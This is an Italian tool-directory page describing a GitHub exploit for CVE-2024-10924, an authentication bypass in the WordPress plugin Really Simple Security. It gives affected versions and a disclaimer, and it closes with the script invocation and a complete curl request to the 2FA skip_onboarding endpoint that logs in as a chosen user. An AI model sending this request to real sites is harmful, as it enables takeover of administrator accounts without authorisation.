Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-10924 — Exploit per CVE-2024-10924, un bypass critico dell'autenticazione nel plugin WordPress Really Simple Security (versioni 9.0.0-9.1.1.1). Consente a utenti non autenticati di accedere come qualsiasi utente sfruttando una falla nell'API di autenticazione a due fattori. | Kitploit
Strumenti/GitHubGitHub/cy3erdr4g0n/cve-2024-10924
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneApprendimento e Formazione
GitHubcy3erdr4g0n/cve-2024-10924

CVE-2024-10924

Exploit per CVE-2024-10924, un bypass critico dell'autenticazione nel plugin WordPress Really Simple Security (versioni 9.0.0-9.1.1.1). Consente a utenti non autenticati di accedere come qualsiasi utente sfruttando una falla nell'API di autenticazione a due fattori.

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit per CVE-2024-10924 (Plugin Really Simple Security per WordPress - Bypass di Autenticazione)

📌 Panoramica

CVE-2024-10924 è una vulnerabilità critica di bypass dell'autenticazione nel plugin Really Simple Security per WordPress (versioni 9.0.0 a 9.1.1.1). Questa vulnerabilità consente a attaccanti non autenticati di accedere come qualsiasi utente (incluso l'amministratore) sfruttando un difetto nell'API di autenticazione a due fattori (2FA).

ID CVE: CVE-2024-10924

Gravità: 🔥 Critica (CVSS 9.8)

Versioni Affette: Really Simple Security 9.0.0 – 9.1.1.1

Versione Correttiva: 9.1.2

Tipo di Exploit: Bypass di Autenticazione

⚠️ Avvertenza

🚨 Questo exploit è solo per scopi educativi e di ricerca sulla sicurezza.

L'uso non autorizzato su sistemi di cui non si è proprietari è illegale. L'obiettivo è aiutare i professionisti della sicurezza a testare e correggere i sistemi vulnerabili.

🔧 Requisiti

Un sito WordPress che esegue una versione vulnerabile del plugin Really Simple Security. Python 3.x o cURL installato per i test. Il nome utente dell'amministratore WordPress target (potrebbe essere necessaria l'enumerazione degli utenti).

Esegui lo script:

python3 exploit.py <url example : http://target.com> <user_id>

manualmente con Curl

curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v

Scarica lo strumento